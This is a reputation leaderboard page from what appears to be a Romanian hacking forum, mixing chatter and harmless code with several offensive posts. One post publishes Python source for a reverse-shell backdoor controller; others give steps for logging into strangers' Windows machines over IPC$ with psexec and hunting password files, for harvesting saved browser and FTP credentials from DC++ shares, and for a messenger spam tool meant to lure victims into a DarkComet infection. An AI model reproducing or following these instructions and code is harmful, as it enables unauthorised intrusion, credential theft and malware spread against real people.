Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 10/30/11 in all areas

  1. SCOS LINK CARNAT SI BANATI PROSTIE PENTRUM ! AVEM NEVOIE NU DE DUMINICA HACERI SEARA ! MULTUMIT DE INTELEGEM. Nu prea stiu pakistaneza. Pana una alta, pleaca-n pula mea de pe forum. Nu cred ca e nevoie sa ma semnez sa intelegi cine ti-a dat ban!
    1 point
  2. Program in java care detecteaza si contureaza formele din imagini. Nu a mers sa pun codul, probabil era prea mare, asa ca las link cu proiectul http://www.megaupload.com/?d=L1YUUQAD samples:
    1 point
  3. Pai si aia ti-a spus si AhEaD In loc de codul tau pui <?php $b=('4 3 4 -'); $b = str_replace(" -", "",$; $c=explode(' ',$; $a=array_sum($c) / count($c); echo $a; ?>
    1 point
  4. Nu are legatura cu forumul dar poate sunt iubitori de munte pe aici Index of /public/kirandulasok/00_Harti
    1 point
  5. A fost gandit ca un simplu backdoor dar mai trebuie lucrat la el, este in stare functionala asa ca am hotarat sa vi-l arat si voua , sa va dati cu parerea la ce ar trebui imbunatatit adaugat etc . Known bugs: Daca dati dir de exemplu intr-un folder unde sunt multe fisiere controller-ul va va da eroarea : [WARNING] Checksum mismatch !!! . Rezolvare ? Trebuie sa impun o limita asupra fluxului de date trimise prin socket de la server catre controller. Nu stiu daca va va fi de folos dar poate va va ajuta sa intelegeti cum functioneaza modelul client <-> server ( pe mine m-a ajutat mult ! ) si ma ajutat sa nu ma plictisesc prea tare in weekend . controller: Python code - 102 lines - codepad app (server): Python code - 148 lines - codepad Mostra : Controller: import zlib import struct from Crypto.Cipher import AES import argparse import socket import sys import re key = "s3cr3t0stuff0u0mad3bro?" class CheckSumError(Exception): pass def _lazysecret(secret, blocksize=32, padding='}'): """pads secret if not legal AES block size (16, 24, 32)""" if not len(secret) in (16, 24, 32): return secret + (blocksize - len(secret)) * padding return secret def encrypt(plaintext, secret, lazy=True, checksum=True): """encrypt plaintext with secret plaintext - content to encrypt secret - secret to encrypt plaintext lazy - pad secret if less than legal blocksize (default: True) checksum - attach crc32 byte encoded (default: True) returns ciphertext """ secret = _lazysecret(secret) if lazy else secret encobj = AES.new(secret, AES.MODE_CFB) if checksum: plaintext += struct.pack("i", zlib.crc32(plaintext)) return encobj.encrypt(plaintext) def decrypt(ciphertext, secret, lazy=True, checksum=True): """decrypt ciphertext with secret ciphertext - encrypted content to decrypt secret - secret to decrypt ciphertext lazy - pad secret if less than legal blocksize (default: True) checksum - verify crc32 byte encoded checksum (default: True) returns plaintext """ secret = _lazysecret(secret) if lazy else secret encobj = AES.new(secret, AES.MODE_CFB) plaintext = encobj.decrypt(ciphertext) if checksum: crc, plaintext = (plaintext[-4:], plaintext[:-4]) if not crc == struct.pack("i", zlib.crc32(plaintext)): raise CheckSumError("[WARNING] Checksum mismatch !!!") return plaintext def main(): desc = """Reverse shell handler: controller.exe -l ip port to listen for connections!""" parser = argparse.ArgumentParser(description=desc) parser.add_argument('ip', help='IP address for listening or connecting.') parser.add_argument('port', help='Port for listening or connecting.') group = parser.add_mutually_exclusive_group() group.add_argument('-l', action='store_true', help='Setup a listening server.') print '[INFO] Parsing arguments...' args = parser.parse_args() print '[INFO] Setting the socket...' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if args.l == True: print '[INFO] Binding on : %s:%s' %(args.ip, args.port) sock.bind((args.ip, int(args.port))) print '[INFO] Socket listening for connections...' sock.listen(5) print '[INFO] All set!' app_socket, app_ip = sock.accept() print '[INFO] Server attempting to connect! ' while True: data = decrypt(app_socket.recv(1024), key) print data cmd = raw_input(">>>") if cmd == "exit": app_socket.send(encrypt("/close", key)) sock.close() sys.exit(0) else: app_socket.send(encrypt(cmd, key)) if __name__ == '__main__': main() Le: apare controller.exe la descriere fiindca intentioenz sa il fac ca exe cu py2exe xD .
    1 point
  6. Security+ Study Guide by Michael A. Pastore Publisher: Sybex Inc (February 21, 2003) | ISBN: 078214098X | Pages: 656 | CHM | 5.72 MB The Security+ certification was developed at CompTIA in response to both corporate and government requests for a certification that validates foundation-level IT security skills. Topics covered include access control, authentication, intrusion detection, malicious code, cryptography, physical security, disaster recovery, policies and procedures and more. The CD includes an advanced testing program with two bonus sample exams, as well as electronic flashcards for both PCs, Pocket PCs and Palm devices. Get 5653078214098X.chm on Wupload.com Download 5653078214098X.chm for free on Filesonic.com Enjoy
    1 point
  7. :idea: Care stie nijte "hackereli"de acest gen pentru:automat de cafea sau altceva asemanator? :twisted:
    -1 points
  8. well shit shit and shit... poi mai intai tzinta tre' sa aiba ip extern(clar) dupaia tre' sa aiba firewall scos(is o groaza care il au scos.. kiar dak s-au kinuit astia cu service pack 2...) ii dati un ping ca sa fiti siguri... dupaia bagati in command prompt net use \\[ip-u tzintei]\ipc$ /user:administrator daca va arata "the command completed successfully" atunci e bine... luati de pe www.sysinternals.com din sectiunea download PsTools, il dezarhivati si puneti in "windows/system32" fisierele psexec si psloggedon.. dupa care scrieti in cmd psexec \\[ip] -u administrator -c psloggedon \\[ip] va autentificati (e o kestie de securitate aici...) si ar trebui in mare parte sa va apara pe ecran userele logate dupaia ca sa luati si parolele dati un search pe remote pt fisierele *.pwd .ped .psr .psx si .db(de obicei pe acolo se gasesc parolle) desikdeti fisierele cu un hex si cautati si voi cuvinte cheie gen password and shit... si dupaia va logati cu user + pass e o kestie de noroc in mare parte
    -1 points
  9. Salut am si io o intrebare dc nu gasesc victima adk (portu 5010) ? imi spune cineva ceva ? Eu Gasesc Doar Portu 5050 Poza: 1
    -1 points
  10. http://rstcenter.com/forum/34856-how-crack-wep-using-backtrack-w-pictures.rst
    -1 points
  11. presupunem ca suntem in posesia unui server de istealer si dorim sa aflam adresa control panelului (locul unde ajung parolele furate) Aplicatii necesare: 1. Process explorer 2. Server istealer In primul si in primul rand se recomanda folosirea unui pc dedicat pt teste de genu (pc real/ vmware/virtual pc etc ) pentru a ne feri eventualele experiente neplacute. Intrucat serverele de istealer au obiceiul sa dispara imediat dupa ce "isi fac treaba" trebuie sa ne asiguram ca procesul ramane in viata pe toata durata acestei analize Click dr pe procesul in cauza si ii suspendam activitatea odata suspendat procesul ne putem continua analiza linistiti properties... strings... ne intereseaza in special stringurile din memorie, asa ca... urmatorul pas e sa aruncam un ochi prin stringuri dupa siruri de caractere gen "http://" "www" "index.php" ".com" etc and... surprize... acuma... la adresa respectiva ar trebui sa gasim ceva de genu... sau in cazul versiunilor mai vechi... job done.
    -1 points
  12. Yahoo! Messenger PM Spammer [+] Creati-va un fisier cu boti bot:pass bot:pass [+] Creati-va o lista de victime id1 id2 id3 Cate un id pe linie [+] Creati-va un fisier cu mesaje Intra pe http://site-ul-meu.com sa vezi ce site misto am Intra pe http://site-ul-meu.com sa te infectez cu un server DarkComet Daca lista de id-uri(victime) e mare ar trebui sa creati cate mai multe mesaje! Eu am facut proba pe lista mea (132 id-uri) cu 20 de mesaje, a mers prea bine.Am avut parte de 1 singur LogOut al botului Bifezi Auto logare (daca e prins ca face spam se va loga automat cu alt bot din lista ta de boti) Selectezi intervalul de timp Dai Start Spam Foloseste keystroke (SendKeys) asa ca mare atentie ce face-ti in timpul spamului.Eu l-am pus pe un RDP. /!\ Cat mai multe mesaje = rata de succes mai mare /!\ /!\ FOLOSITI DOAR BOTI FACUTI PE SERVER DE US CU LIMBA DIN INBOX EN-US /!\ Cand faceti proba trebuie sa aveti cel putin 2 victime ! Un interval de timp mai mare duce la un spam mai sigur cu un numar de log out-uri mai putin ! Download Link : WWI5aFg2MTIvMFJDUitkQm1FTHdWJTNEOTFVSy9tWFkvU1krQXpXTHhvZFlRdVZvcUIlM0RiLyUzRFhYTjFiK3BPLzVRTC9iOWxZNjFMUWJ4WWVFQmk3WUd3N1luajdZbmo3WUd3U2JueVZYJTNEMm1vcExWekxObVlHMSUyMCUzQyUzQyUyMEFjdW0lMjBUcmlwbyUyMDU= [*] +rep daca va este folositor
    -1 points
  13. O modalitate usoara de a gasi conturi de email,ftp-uri,trackere este sa folositi un client gen DC++ cautind fisiere in care se salveaza parolele la diverse programe. Primul lucru care il facem este sa cautam o lista cu huburi: In cautare putem folosi cuvinte ca: Opera - wand.dat Filezilla -filezilla.xml ,recentservers.xml ,sitemanager.xml Firefox - signons.sqlite/key3.db/secmod.db (C:\Documents and Settings\Windows login/user name\Application Data\Mozilla\Firefox\Profiles\Profile name\) Dupa ce descarcam fisierele gasite,vom decripta parolele folosind Multi Password Recovery(MPR) Parolele le gasiti de la cei ce dau share la discul C sau alte discuri pe care este instalat soft portabil. Este o metoda veche si simpla insa poate fi utila in special cind ai nevoie urgenta de un cont de email sau ftp.
    -1 points
×
×
  • Create New...